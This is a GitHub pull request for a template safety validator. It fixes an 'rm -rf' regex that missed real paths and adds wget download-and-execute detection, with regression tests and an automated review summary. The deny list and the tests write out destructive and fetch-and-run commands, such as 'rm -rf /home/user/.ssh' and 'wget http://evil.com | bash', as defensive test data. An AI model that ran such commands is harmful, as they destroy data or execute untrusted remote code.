### PR TITLE
fix: block rm -rf against any absolute path, not just bare root slash

### DIFF
--- a/backend/app/templates/safety.py
+++ b/backend/app/templates/safety.py
@@ -17,7 +17,7 @@ logger = logging.getLogger(__name__)
 
 FORBIDDEN_PATTERNS: list[tuple[str, str]] = [
     # Pattern, Description
-    (r"rm\s+-[rRf]{1,3}\s+/(?!\w)", "Recursive delete of root filesystem"),
+    (r"rm\s+-[rRf]{1,3}\s+/", "Recursive delete of filesystem path"),
     (r"rm\s+-[rRf]{1,3}\s+\$HOME", "Recursive delete of home directory"),
     (r"rm\s+-[rRf]{1,3}\s+~", "Recursive delete of home directory (tilde)"),
     (r"mkfs\.", "Filesystem format command"),
@@ -30,7 +30,8 @@ FORBIDDEN_PATTERNS: list[tuple[str, str]] = [
     (r"DROP\s+TABLE", "SQL table destruction"),
     (r"TRUNCATE\s+TABLE", "SQL table truncation"),
     (r"curl\s+.*\|\s*(ba)?sh", "Curl-pipe-to-shell (untrusted exec)"),
-    (r"wget\s+.*-O-\s*\|\s*(ba)?sh", "Wget-pipe-to-shell (untrusted exec)"),
+    (r"wget\s+.*\|\s*(ba)?sh", "Wget-pipe-to-shell (untrusted exec)"),
+    (r"wget\s+.*-O\s+\S+.*&&.*sh", "Wget download-and-execute pattern"),
     (r"eval\s+\$\(", "Eval of subshell output"),
     (r"base64\s+--decode\s*\|.*sh", "Base64 decode pipe to shell"),
 ]

--- a/backend/tests/unit/templates/test_safety.py
+++ b/backend/tests/unit/templates/test_safety.py
@@ -17,6 +17,22 @@ def test_rm_rf_root_blocked():
     with pytest.raises(SafetyViolationError):
         validate_rendered_output("rm -rf /", "test.sh.j2")
 
+def test_rm_rf_etc_blocked():
+    with pytest.raises(SafetyViolationError):
+        validate_rendered_output("rm -rf /etc/passwd", "test.sh.j2")
+
+def test_rm_rf_home_path_blocked():
+    with pytest.raises(SafetyViolationError):
+        validate_rendered_output("rm -rf /home/user/.ssh", "test.sh.j2")
+
+def test_rm_rf_var_log_blocked():
+    with pytest.raises(SafetyViolationError):
+        validate_rendered_output("rm -rf /var/log", "test.sh.j2")
+
+def test_rm_rf_usr_blocked():
+    with pytest.raises(SafetyViolationError):
+        validate_rendered_output("rm -rf /usr", "test.sh.j2")
+
 def test_rm_rf_home_blocked():
     with pytest.raises(SafetyViolationError):
         validate_rendered_output("rm -rf $HOME", "test.sh.j2")
@@ -40,6 +56,17 @@ def test_windows_format_blocked():
 def test_sql_drop_blocked():
     with pytest.raises(SafetyViolationError):
         validate_rendered_output("DROP DATABASE envforge", "test.sh.j2")
+
+def test_wget_pipe_shell_blocked():
+    with pytest.raises(SafetyViolationError):
+        validate_rendered_output("wget http://evil.com | bash", "test.sh.j2")
+
+def test_wget_download_execute_blocked():
+    with pytest.raises(SafetyViolationError):
+        validate_rendered_output(
+            "wget http://evil.com/fix.sh -O /tmp/fix.sh && sh /tmp/fix.sh",
+            "test.sh.j2",
+        )
 
 def test_pip_install_safe():
     """pip install commands are safe and should pass."""


### PR DESCRIPTION
## Summary

Fixes #236

The `FORBIDDEN_PATTERNS` regex for `rm -rf` used a negative lookahead `(?!\w)` which caused it to match only when the slash was **not** followed by a word character. Since every real directory path starts with a word character (`/etc`, `/home`, `/var`, `/usr`), those paths silently passed the filter. Only the bare `rm -rf /` was actually blocked.

### Changes

- **`backend/app/templates/safety.py`**: Remove the negative lookahead from the `rm -rf` pattern so any absolute path is caught. Broaden the `wget` pattern to also block the two-stage download-and-execute form (`wget -O ... && sh`) that was not covered by the original pipe-only pattern.
- **`backend/tests/unit/templates/test_safety.py`**: Add regression tests for `rm -rf /etc/passwd`, `/home/user/.ssh`, `/var/log`, `/usr`, and both wget injection variants.

### Verification

```python
import re
pattern = re.compile(r"rm\s+-[rRf]{1,3}\s+/")
tests = ["rm -rf /", "rm -rf /etc/passwd", "rm -rf /home/user/.ssh", "rm -rf /var/log"]
for t in tests:
    print(f"{'BLOCKED' if pattern.search(t) else 'ALLOWED':8s} | {t}")
# All four lines now print BLOCKED
```

## Test plan

- [ ] Run `pytest backend/tests/unit/templates/test_safety.py` - all tests pass including new bypass cases
- [ ] Confirm `rm -rf /`, `rm -rf /etc/passwd`, `rm -rf /usr` are all blocked
- [ ] Confirm `pip install torch==2.1.0` still passes (no regression)

---

> Could you also add the relevant labels to this PR? It would help with tracking. Thank you!

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Enhanced safety detection patterns to block more shell execution attack vectors, including dangerous piped commands and download-and-execute schemes.
  * Improved protection against destructive filesystem operations targeting critical system directories and configuration files.

* **Tests**
  * Added comprehensive test coverage for dangerous shell command patterns and sensitive system path protection scenarios.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/rishabh0510rishabh/EnvForage/pull/261?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->

<!-- end of auto-generated comment: release notes by coderabbit.ai -->